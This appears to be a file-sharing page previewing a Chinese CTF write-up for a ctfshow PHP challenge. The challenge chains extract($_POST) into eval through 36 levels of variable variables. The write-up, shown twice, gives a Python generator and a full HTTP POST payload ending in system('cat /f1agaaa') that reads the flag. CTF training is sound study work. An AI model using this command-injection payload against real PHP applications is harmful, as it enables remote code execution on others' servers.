02-13 12:02
文件名称:
我的眼里只有$.md
所在目录:
CTF / ctfshow / Web
文件大小:
2.63 KB
下载地址:
文本预览:
# 我的眼里只有$
[题目地址](https://ctf.show/challenges#%E6%88%91%E7%9A%84%E7%9C%BC%E9%87%8C%E5%8F%AA%E6%9C%89$-3869)
没有难点,但是很绕。关键在于知道[extract](https://www.php.net/manual/zh/function.extract.php)函数。官方文档写的有点绕,不过给出的例子还是很清晰的。就是把数组的键当作变量,值为原数组键的值。$符号传引用,举个例子:
```php
$a='yes';
$b='a';
echo $$b;
?>
```
输出yes。可以这么看就不绕了:先读最右边的\$b,得到a,和剩下的\$拼起来得到\$a,获得yes的值。更多\$的情况也能这么读,一个一个往左边消。现在看题。
```php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2022-11-10 17:20:38
# @Last Modified by: h1xa
# @Last Modified time: 2022-11-11 08:21:54
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
error_reporting(0);
extract($_POST);
eval($$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$_);
highlight_file(__FILE__);
```
首先要数有多少个$。count函数得到36个,那就要往post里传36个值,最后一个是要执行的命令。手打很累,直接python脚本。
```python
from string import ascii_letters
print('$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$'.count('$'))
for i in range(35):
print(f"${ascii_letters[i]}='{ascii_letters[i+1]}';")
for i in range(35):
print(f"={ascii_letters[i]}&{ascii_letters[i]}",end='')
```
第一个for语句是拿来做实验的。
```php
$_='a';
$a='b';
$b='c';
$c='d';
$d='e';
$e='f';
$f='g';
$g='h';
$h='i';
$i='j';
$j='k';
$k='l';
$l='m';
$m='n';
$n='o';
$o='p';
$p='q';
$q='r';
$r='s';
$s='t';
$t='u';
$u='v';
$v='w';
$w='x';
$x='y';
$y='z';
$z='A';
$A='B';
$B='C';
$C='D';
$D='E';
$E='F';
$F='G';
$G='H';
$H='I';
$I="system('ls');";
echo $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$_;
eval($$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$_);
?>
```
最后bp发包。(获取flag前先用ls /查看flag名)。
```
POST / HTTP/1.1
Host: f8d2531f-4ba8-4dea-b890-4b815f21cca5.challenge.ctf.show
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 165
_=a&a=b&b=c&c=d&d=e&e=f&f=g&g=h&h=i&i=j&j=k&k=l&l=m&m=n&n=o&o=p&p=q&q=r&r=s&s=t&t=u&u=v&v=w&w=x&x=y&y=z&z=A&A=B&B=C&C=D&D=E&E=F&F=G&G=H&H=I&I=system('cat+/f1agaaa');
```
## Flag
> ctfshow{ed724973-cfa9-43a5-a790-b19a1c3928c5}
[题目地址](https://ctf.show/challenges#%E6%88%91%E7%9A%84%E7%9C%BC%E9%87%8C%E5%8F%AA%E6%9C%89$-3869)
没有难点,但是很绕。关键在于知道[extract](https://www.php.net/manual/zh/function.extract.php)函数。官方文档写的有点绕,不过给出的例子还是很清晰的。就是把数组的键当作变量,值为原数组键的值。$符号传引用,举个例子:
```php
$a='yes';
$b='a';
echo $$b;
?>
```
输出yes。可以这么看就不绕了:先读最右边的\$b,得到a,和剩下的\$拼起来得到\$a,获得yes的值。更多\$的情况也能这么读,一个一个往左边消。现在看题。
```php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2022-11-10 17:20:38
# @Last Modified by: h1xa
# @Last Modified time: 2022-11-11 08:21:54
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
error_reporting(0);
extract($_POST);
eval($$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$_);
highlight_file(__FILE__);
```
首先要数有多少个$。count函数得到36个,那就要往post里传36个值,最后一个是要执行的命令。手打很累,直接python脚本。
```python
from string import ascii_letters
print('$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$'.count('$'))
for i in range(35):
print(f"${ascii_letters[i]}='{ascii_letters[i+1]}';")
for i in range(35):
print(f"={ascii_letters[i]}&{ascii_letters[i]}",end='')
```
第一个for语句是拿来做实验的。
```php
$_='a';
$a='b';
$b='c';
$c='d';
$d='e';
$e='f';
$f='g';
$g='h';
$h='i';
$i='j';
$j='k';
$k='l';
$l='m';
$m='n';
$n='o';
$o='p';
$p='q';
$q='r';
$r='s';
$s='t';
$t='u';
$u='v';
$v='w';
$w='x';
$x='y';
$y='z';
$z='A';
$A='B';
$B='C';
$C='D';
$D='E';
$E='F';
$F='G';
$G='H';
$H='I';
$I="system('ls');";
echo $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$_;
eval($$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$_);
?>
```
最后bp发包。(获取flag前先用ls /查看flag名)。
```
POST / HTTP/1.1
Host: f8d2531f-4ba8-4dea-b890-4b815f21cca5.challenge.ctf.show
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 165
_=a&a=b&b=c&c=d&d=e&e=f&f=g&g=h&h=i&i=j&j=k&k=l&l=m&m=n&n=o&o=p&p=q&q=r&r=s&s=t&t=u&u=v&v=w&w=x&x=y&y=z&z=A&A=B&B=C&C=D&D=E&E=F&F=G&G=H&H=I&I=system('cat+/f1agaaa');
```
## Flag
> ctfshow{ed724973-cfa9-43a5-a790-b19a1c3928c5}
点赞
回复
X